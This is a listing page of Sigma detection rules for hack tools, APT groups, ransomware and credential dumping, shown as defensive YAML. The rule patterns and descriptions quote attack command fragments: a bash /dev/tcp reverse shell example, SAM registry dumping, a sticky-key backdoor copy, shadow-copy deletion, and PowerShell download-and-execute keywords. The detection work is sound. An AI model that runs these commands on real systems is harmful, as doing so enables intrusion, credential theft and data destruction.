TargetFilename|endswith: 'dumpert.dmp'
condition: selection
falsepositives:
- Very unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
HackTool - Empire PowerShell UAC Bypass
Detects some Empire PowerShell UAC bypass methods
view Sigma YAML
title: HackTool - Empire PowerShell UAC Bypass
id: 3268b746-88d8-4cd3-bffc-30077d02c787
status: stable
description: Detects some Empire PowerShell UAC bypass methods
references:
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64
author: Ecco
date: 2019-08-30
modified: 2023-02-21
tags:
- attack.privilege-escalation
- attack.t1548.002
- car.2019-04-001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)'
- ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
HackTool - F-Secure C3 Load by Rundll32
F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
view Sigma YAML
title: HackTool - F-Secure C3 Load by Rundll32
id: b18c9d4c-fac9-4708-bd06-dd5bfacf200f
status: test
description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
references:
- https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12
author: Alfie Champion (ajpc500)
date: 2021-06-02
modified: 2023-03-05
tags:
- attack.stealth
- attack.t1218.011
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'rundll32.exe'
- '.dll'
- 'StartNodeRelay'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
HackTool - Inveigh Execution Artefacts
Detects the presence and execution of Inveigh via dropped artefacts
view Sigma YAML
title: HackTool - Inveigh Execution Artefacts
id: bb09dd3e-2b78-4819-8e35-a7c1b874e449
status: test
description: Detects the presence and execution of Inveigh via dropped artefacts
references:
- https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs
- https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs
- https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2024-06-27
tags:
- attack.command-and-control
- attack.t1219.002
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith:
- '\Inveigh-Log.txt'
- '\Inveigh-Cleartext.txt'
- '\Inveigh-NTLMv1Users.txt'
- '\Inveigh-NTLMv2Users.txt'
- '\Inveigh-NTLMv1.txt'
- '\Inveigh-NTLMv2.txt'
- '\Inveigh-FormInput.txt'
- '\Inveigh.dll'
- '\Inveigh.exe'
- '\Inveigh.ps1'
- '\Inveigh-Relay.ps1'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
HackTool - Mimikatz Kirbi File Creation
Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
view Sigma YAML
title: HackTool - Mimikatz Kirbi File Creation
id: 9e099d99-44c2-42b6-a6d8-54c3545cab29
related:
- id: 034affe8-6170-11ec-844f-0f78aa0c4d66
type: obsolete
status: test
description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
references:
- https://cobalt.io/blog/kerberoast-attack-techniques
- https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
author: Florian Roth (Nextron Systems), David ANDRE
date: 2021-11-08
modified: 2024-06-27
tags:
- attack.credential-access
- attack.t1558
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith:
- '.kirbi' # Kerberos tickets
- 'mimilsa.log' # MemSSP default file
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
HackTool - QuarksPwDump Dump File
Detects a dump file written by QuarksPwDump password dumper
view Sigma YAML
title: HackTool - QuarksPwDump Dump File
id: 847def9e-924d-4e90-b7c4-5f581395a2b4
status: test
description: Detects a dump file written by QuarksPwDump password dumper
references:
- https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
author: Florian Roth (Nextron Systems)
date: 2018-02-10
modified: 2024-06-27
tags:
- attack.credential-access
- attack.t1003.002
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains|all:
- '\AppData\Local\Temp\SAM-'
- '.dmp'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
HackTool - Sliver C2 Implant Activity Pattern
Detects process activity patterns as seen being used by Sliver C2 framework implants
view Sigma YAML
title: HackTool - Sliver C2 Implant Activity Pattern
id: 42333b2c-b425-441c-b70e-99404a17170f
status: test
description: Detects process activity patterns as seen being used by Sliver C2 framework implants
references:
- https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36
- https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2022-08-25
modified: 2023-03-05
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: '-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
High FP
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
view Sigma YAML
title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
id: 3be82d5d-09fe-4d6a-a275-0d40d234d324
status: test
description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
references:
- https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver
- https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
author: Florian Roth (Nextron Systems)
date: 2021-11-22
modified: 2022-12-25
tags:
- attack.privilege-escalation
- attack.t1068
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
selection:
Image|endswith: '\msiexec.exe'
TargetFilename|startswith: 'C:\Program Files (x86)\Microsoft\Edge\Application'
TargetFilename|endswith: '\elevation_service.exe'
condition: selection
falsepositives:
- Unknown
- Possibly some Microsoft Edge upgrades
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
view Sigma YAML
title: Lazarus Group Activity
id: 24c4d154-05a4-4b99-b57d-9b977472443a
related:
- id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
type: obsolete
status: test
description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
references:
- https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
- https://www.hvs-consulting.de/lazarus-report/
author: Florian Roth (Nextron Systems), wagga
date: 2020-12-23
modified: 2023-03-10
tags:
- attack.g0032
- attack.execution
- attack.t1059
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_generic:
CommandLine|contains:
- 'reg.exe save hklm\sam %temp%\~reg_sam.save'
- '1q2w3e4r@#$@#$@#$'
- ' -hp1q2w3e4 '
- '.dat data03 10000 -p '
selection_netstat:
CommandLine|contains|all:
- 'netstat -aon | find '
- 'ESTA'
- ' > %temp%\~'
# Network share discovery
selection_network_discovery:
CommandLine|contains|all:
- '.255 10 C:\ProgramData\IBM\'
- '.DAT'
selection_persistence:
CommandLine|contains|all:
- ' /c '
- ' -p 0x'
CommandLine|contains:
- 'C:\ProgramData\'
- 'C:\RECYCLER\'
selection_rundll32:
CommandLine|contains|all:
- 'rundll32 '
- 'C:\ProgramData\'
CommandLine|contains:
- '.bin,'
- '.tmp,'
- '.dat,'
- '.io,'
- '.ini,'
- '.db,'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
Leviathan Registry Key Activity
Detects registry key used by Leviathan APT in Malaysian focused campaign
view Sigma YAML
title: Leviathan Registry Key Activity
id: 70d43542-cd2d-483c-8f30-f16b436fd7db
status: test
description: Detects registry key used by Leviathan APT in Malaysian focused campaign
references:
- https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign
author: Aidan Bracher
date: 2020-07-07
modified: 2023-09-19
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1547.001
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: '\Software\Microsoft\Windows\CurrentVersion\Run\ntkd'
condition: selection
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
Linux Reverse Shell Indicator
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
view Sigma YAML
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
category: network_connection
detection:
selection:
Image|endswith: '/bin/bash'
filter:
DestinationIp:
- '127.0.0.1'
- '0.0.0.0'
condition: selection and not filter
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Strong
High FP
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
view Sigma YAML
title: LockerGoga Ransomware Activity
id: 74db3488-fd28-480a-95aa-b7af626de068
status: stable
description: Detects LockerGoga ransomware activity via specific command line.
references:
- https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a
- https://blog.f-secure.com/analysis-of-lockergoga-ransomware/
- https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/
author: Vasiliy Burov, oscd.community
date: 2020-10-18
modified: 2023-02-03
tags:
- attack.impact
- attack.t1486
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: '-i SM-tgytutrc -s'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
view Sigma YAML
title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
id: 91048c0d-5b81-4b85-a099-c9ee4fb87979
status: test
description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
references:
- https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|contains|all:
- 'aspera'
- '\ruby'
selection_special_child_powershell_img:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
selection_special_child_powershell_cli:
- CommandLine|contains:
- ' echo '
- '-dumpmode'
- '-ssh'
- '.dmp'
- 'add-MpPreference'
- 'adscredentials'
- 'bitsadmin'
- 'certutil'
- 'csvhost.exe'
- 'DownloadFile'
- 'DownloadString'
- 'dsquery'
- 'ekern.exe'
- 'FromBase64String'
- 'iex '
- 'iex('
- 'Invoke-Expression'
- 'Invoke-WebRequest'
- 'localgroup administrators'
- 'o365accountconfiguration'
- 'samaccountname='
- 'set-MpPreference'
- 'svhost.exe'
- 'System.IO.Compression'
- 'System.IO.MemoryStream'
- 'usoprivate'
- 'usoshared'
- 'whoami'
- CommandLine|re:
- '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
- 'net\s+user'
- 'net\s+group'
- 'query\s+session'
selection_special_child_lsass_1:
CommandLine|contains: 'lsass'
selection_special_child_lsass_2:
CommandLine|contains:
- 'procdump'
- 'tasklist'
- 'findstr'
selection_child_wget:
Image|endswith: '\wget.exe'
CommandLine|contains: 'http'
selection_child_curl:
Image|endswith: '\curl.exe'
CommandLine|contains: 'http'
selection_child_script:
CommandLine|contains:
- 'E:jscript'
- 'e:vbscript'
selection_child_localgroup:
CommandLine|contains|all:
- 'localgroup Administrators'
- '/add'
selection_child_net:
CommandLine|contains: 'net' # Covers net1
CommandLine|contains|all:
- 'user'
- '/add'
selection_child_reg:
- CommandLine|contains|all:
- 'reg add'
- 'DisableAntiSpyware'
- '\Microsoft\Windows Defender'
- CommandLine|contains|all:
- 'reg add'
- 'DisableRestrictedAdmin'
- 'CurrentControlSet\Control\Lsa'
selection_child_wmic_1:
CommandLine|contains|all:
- 'wmic'
- 'process call create'
selection_child_wmic_2:
CommandLine|contains|all:
- 'wmic'
- 'delete'
- 'shadowcopy'
selection_child_vssadmin:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_child_wbadmin:
CommandLine|contains|all:
- 'wbadmin'
- 'delete'
- 'catalog'
condition: selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
view Sigma YAML
title: Mint Sandstorm - ManageEngine Suspicious Process Execution
id: 58d8341a-5849-44cd-8ac8-8b020413a31b
status: test
description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
references:
- https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_parent_path:
ParentImage|contains:
- 'manageengine'
- 'ServiceDesk'
selection_parent_image:
ParentImage|contains: '\java'
selection_special_child_powershell_img:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
selection_special_child_powershell_cli:
- CommandLine|contains:
- ' echo '
- '-dumpmode'
- '-ssh'
- '.dmp'
- 'add-MpPreference'
- 'adscredentials'
- 'bitsadmin'
- 'certutil'
- 'csvhost.exe'
- 'DownloadFile'
- 'DownloadString'
- 'dsquery'
- 'ekern.exe'
- 'FromBase64String'
- 'iex '
- 'iex('
- 'Invoke-Expression'
- 'Invoke-WebRequest'
- 'localgroup administrators'
- 'o365accountconfiguration'
- 'samaccountname='
- 'set-MpPreference'
- 'svhost.exe'
- 'System.IO.Compression'
- 'System.IO.MemoryStream'
- 'usoprivate'
- 'usoshared'
- 'whoami'
- CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
- CommandLine|re: 'net\s+user'
- CommandLine|re: 'net\s+group'
- CommandLine|re: 'query\ssession'
selection_special_child_lsass_1:
CommandLine|contains: 'lsass'
selection_special_child_lsass_2:
CommandLine|contains:
- 'procdump'
- 'tasklist'
- 'findstr'
selection_child_wget:
Image|endswith: '\wget.exe'
CommandLine|contains: 'http'
selection_child_curl:
Image|endswith: '\curl.exe'
CommandLine|contains: 'http'
selection_child_script:
CommandLine|contains:
- 'E:jscript'
- 'e:vbscript'
selection_child_localgroup:
CommandLine|contains|all:
- 'localgroup Administrators'
- '/add'
selection_child_net:
CommandLine|contains: 'net' # Covers net1
CommandLine|contains|all:
- 'user'
- '/add'
selection_child_reg:
- CommandLine|contains|all:
- 'reg add'
- 'DisableAntiSpyware'
- '\Microsoft\Windows Defender'
- CommandLine|contains|all:
- 'reg add'
- 'DisableRestrictedAdmin'
- 'CurrentControlSet\Control\Lsa'
selection_child_wmic_1:
CommandLine|contains|all:
- 'wmic'
- 'process call create'
selection_child_wmic_2:
CommandLine|contains|all:
- 'wmic'
- 'delete'
- 'shadowcopy'
selection_child_vssadmin:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_child_wbadmin:
CommandLine|contains|all:
- 'wbadmin'
- 'delete'
- 'catalog'
filter_main:
CommandLine|contains|all:
- 'download.microsoft.com'
- 'manageengine.com'
- 'msiexec'
condition: all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
view Sigma YAML
title: Moriya Rootkit File Created
id: a1507d71-0b60-44f6-b17c-bf53220fdd88
related:
- id: 25b9c01c-350d-4b95-bed1-836d04a4f324
type: derived
status: test
description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
references:
- https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2023-05-05
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1543.003
- detection.emerging-threats
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Strong
Medium FP
OceanLotus Registry Activity
Detects registry keys created in OceanLotus (also known as APT32) attacks
view Sigma YAML
title: OceanLotus Registry Activity
id: 4ac5fc44-a601-4c06-955b-309df8c4e9d4
status: test
description: Detects registry keys created in OceanLotus (also known as APT32) attacks
references:
- https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
- https://github.com/eset/malware-ioc/tree/master/oceanlotus
author: megan201296, Jonhnathan Ribeiro
date: 2019-04-14
modified: 2023-09-28
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection_clsid:
TargetObject|contains: '\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
selection_hkcu:
TargetObject|contains:
# HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\
- 'Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\'
# HKCU\SOFTWARE\Classes\AppX3bbba44c6cae4d9695755183472171e2\
- 'Classes\AppX3bbba44c6cae4d9695755183472171e2\'
# HKCU\SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\
- 'Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\'
- 'Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
selection_appx_1:
TargetObject|contains: '\SOFTWARE\App\'
selection_appx_2:
TargetObject|contains:
- 'AppXbf13d4ea2945444d8b13e2121cb6b663\'
- 'AppX70162486c7554f7f80f481985d67586d\'
- 'AppX37cc7fdccd644b4f85f4b22d5a3f105a\'
TargetObject|endswith:
- 'Application'
- 'DefaultIcon'
condition: selection_clsid or selection_hkcu or all of selection_appx_*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Strong
Medium FP
OilRig APT Activity
Detects OilRig activity as reported by Nyotron in their March 2018 report
view Sigma YAML
title: OilRig APT Activity
id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06
related:
- id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System
type: similar
- id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security
type: similar
- id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry
type: similar
status: test
description: Detects OilRig activity as reported by Nyotron in their March 2018 report
references:
- https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
date: 2018-03-23
modified: 2023-03-08
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.defense-impairment
- attack.g0049
- attack.t1053.005
- attack.s0111
- attack.t1543.003
- attack.t1112
- attack.command-and-control
- attack.t1071.004
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_schtasks:
CommandLine|contains|all:
- 'SC Scheduled Scan'
- '\microsoft\Taskbar\autoit3.exe'
selection_temp:
Image|contains: '\Windows\Temp\DB\'
Image|endswith: '.exe'
selection_service:
Image: 'C:\Windows\system32\Service.exe'
CommandLine|contains:
- 'i'
- 'u'
selection_autoit:
ParentImage|endswith: '\local\microsoft\Taskbar\autoit3.exe'
CommandLine|contains|all:
- 'nslookup.exe'
- '-q=TXT'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
OilRig APT Registry Persistence
Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
view Sigma YAML
title: OilRig APT Registry Persistence
id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5
related:
- id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System
type: similar
- id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security
type: similar
- id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation
type: similar
status: test
description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
references:
- https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
date: 2018-03-23
modified: 2023-03-08
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.defense-impairment
- attack.g0049
- attack.t1053.005
- attack.s0111
- attack.t1543.003
- attack.t1112
- attack.command-and-control
- attack.t1071.004
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|endswith:
- 'SOFTWARE\Microsoft\Windows\CurrentVersion\UMe'
- 'SOFTWARE\Microsoft\Windows\CurrentVersion\UT'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
Pandemic Registry Key
Detects Pandemic Windows Implant
view Sigma YAML
title: Pandemic Registry Key
id: 47e0852a-cf81-4494-a8e6-31864f8c86ed
status: test
description: Detects Pandemic Windows Implant
references:
- https://wikileaks.org/vault7/#Pandemic
- https://twitter.com/MalwareJake/status/870349480356454401
author: Florian Roth (Nextron Systems)
date: 2017-06-01
modified: 2022-10-09
tags:
- attack.command-and-control
- attack.t1105
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: '\SYSTEM\CurrentControlSet\services\null\Instance'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
Persistence Via Sticky Key Backdoor
By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
When the sticky keys are "activated" the privilleged shell is launched.
view Sigma YAML
title: Persistence Via Sticky Key Backdoor
id: 1070db9a-3e5d-412e-8e7b-7183b616e1b3
status: test
description: |
By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
When the sticky keys are "activated" the privilleged shell is launched.
references:
- https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html
- https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf
- https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors
author: Sreeman
date: 2020-02-18
modified: 2023-03-07
tags:
- attack.persistence
- attack.t1546.008
- attack.privilege-escalation
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains|all:
- 'copy '
- '/y '
- 'C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
Potential Conti Ransomware Activity
Detects a specific command used by the Conti ransomware group
view Sigma YAML
title: Potential Conti Ransomware Activity
id: 689308fc-cfba-4f72-9897-796c1dc61487
status: test
description: Detects a specific command used by the Conti ransomware group
references:
- https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/
- https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19
author: frack113
date: 2021-10-12
modified: 2023-02-13
tags:
- attack.impact
- attack.s0575
- attack.t1486
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- '-m '
- '-net '
- '-size ' # Size 10 in references
- '-nomutex '
- '-p \\\\'
- '$'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
Potential Credential Dumping Via LSASS Process Clone
Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
view Sigma YAML
title: Potential Credential Dumping Via LSASS Process Clone
id: c8da0dfd-4ed0-4b68-962d-13c9c884384e
status: test
description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
references:
- https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/
- https://twitter.com/Hexacorn/status/1420053502554951689
- https://twitter.com/SBousseaden/status/1464566846594691073?s=20
author: Florian Roth (Nextron Systems), Samir Bousseaden
date: 2021-11-27
modified: 2023-03-02
tags:
- attack.credential-access
- attack.t1003
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\Windows\System32\lsass.exe'
Image|endswith: '\Windows\System32\lsass.exe'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
Potential Credential Dumping Via LSASS SilentProcessExit Technique
Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
view Sigma YAML
title: Potential Credential Dumping Via LSASS SilentProcessExit Technique
id: 55e29995-75e7-451a-bef0-6225e2f13597
related:
- id: 36803969-5421-41ec-b92f-8500f79c23b0
type: similar
status: test
description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
references:
- https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
- https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
author: Florian Roth (Nextron Systems)
date: 2021-02-26
modified: 2022-12-19
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
Potential DCOM InternetExplorer.Application DLL Hijack
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
view Sigma YAML
title: Potential DCOM InternetExplorer.Application DLL Hijack
id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa
related:
- id: e554f142-5cf3-4e55-ace9-a1b59e0def65
type: obsolete
- id: f354eba5-623b-450f-b073-0b5b2773b6aa
type: similar
status: test
description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
references:
- https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
date: 2020-10-12
modified: 2022-12-18
tags:
- attack.lateral-movement
- attack.t1021.002
- attack.t1021.003
logsource:
product: windows
category: file_event
detection:
selection:
Image: System
TargetFilename|endswith: '\Internet Explorer\iertutil.dll'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
view Sigma YAML
title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
id: f354eba5-623b-450f-b073-0b5b2773b6aa
related:
- id: e554f142-5cf3-4e55-ace9-a1b59e0def65
type: obsolete
- id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa
type: similar
status: test
description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
references:
- https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
date: 2020-10-12
modified: 2022-12-18
tags:
- attack.lateral-movement
- attack.t1021.002
- attack.t1021.003
logsource:
product: windows
category: image_load
detection:
selection:
Image|endswith: '\Internet Explorer\iexplore.exe'
ImageLoaded|endswith: '\Internet Explorer\iertutil.dll'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
Showing 1-50 of 1,524